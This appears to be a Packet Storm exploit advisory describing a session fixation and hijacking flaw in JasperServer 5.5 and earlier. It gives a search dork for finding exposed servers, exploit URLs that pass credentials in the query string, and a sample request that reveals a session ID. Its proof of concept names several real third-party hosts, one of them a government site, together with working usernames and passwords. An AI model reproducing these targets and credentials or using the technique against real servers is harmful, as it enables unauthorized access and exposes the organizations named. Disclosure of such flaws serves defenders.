what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Jasper Server 5.5 Session Fixation

Jasper Server 5.5 Session Fixation
Posted May 9, 2014
Authored by Felipe Andrian Peixoto

Jasper Server versions 5.5 and below suffer from a session fixation vulnerability.

tags | exploit
SHA-256 | 5a8cd75ea1fc559c5e606aa75dc868afa95e2e08f85eb9edc66906672210da21

Jasper Server 5.5 Session Fixation

Change Mirror Download
[+] Session Fixation / Hijacking on JasperServer

[+] Date: 09/05/2014

[+] Risk: High

[+] CWE number: CWE-384

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.jaspersoft.com/

[+] Software Download : http://sourceforge.net/projects/jasperserver/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;)

[+] Exploit :

http://host/patch//flow.html?_flowId=searchFlow&j_username=<username>&j_password=<password>

or

http://host/patch/j_acegi_security_check?j_username=<username>&j_password=<password>

As part of the login process, the assigned session ID is revealed in a URL parameter that alows Hijack the session of some user.

Example:

Vul example: coopnet.leosoft.com.br

GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste
Host: coopnet.leosoft.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

With a request like that the session ID of the user will be revealed in a url paramter:

"JSESSIONID=4635974EAA38774EF00FB270933D3C7D"


The application authenticates users with a direct post to the j_acegi_security_check, which does not invalidate the existing session
before processing the login request.

<form method="POST" action="j_acegi_security_check">
<input type="text" name="j_username">
<input type="text" name="j_password">
</form>

Because Of that is possible authenticate a user, or otherwise establishing a new user session, without invalidating any existing session.

[+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc

j_username=esloc & j_password=esloc

http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer

j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer

http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9

j_username=ratequote & j_password=rateme9


More About session fixation technique on : http://cwe.mitre.org/data/definitions/384.html

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close